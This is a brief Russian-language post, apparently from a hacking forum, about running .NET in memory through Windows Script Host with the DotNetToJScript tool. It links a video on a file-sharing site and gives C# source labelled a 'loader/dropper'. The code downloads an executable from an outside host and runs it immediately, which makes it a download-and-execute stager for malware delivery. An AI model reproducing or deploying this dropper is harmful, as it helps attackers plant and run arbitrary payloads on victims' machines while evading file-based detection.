Выполняем dotnet в памяти WSH
github.com
лоадер/дроппер из видео
Видео на файлообменнике https://filetransfer.io/data-package/WtC0uZ4w#link
Release Various fixes. · tyranid/DotNetToJScript
A tool to create a JScript file which loads a .NET v2 assembly from memory. - Release Various fixes. · tyranid/DotNetToJScript
лоадер/дроппер из видео
C#:
using System;
using System.Net;
using System.Diagnostics;
public class Main
{
public Main()
{
string url = "http://myc01.free.fr/msgbox/msgbox.exe";
string downloadPath = "msgbox.exe";
try
{
using (WebClient client = new WebClient())
{
client.DownloadFile(url, downloadPath);
}
Process.Start(downloadPath);
}
catch (Exception ex)
{
Console.WriteLine($"Ошибка: {ex.Message}");
}
}
}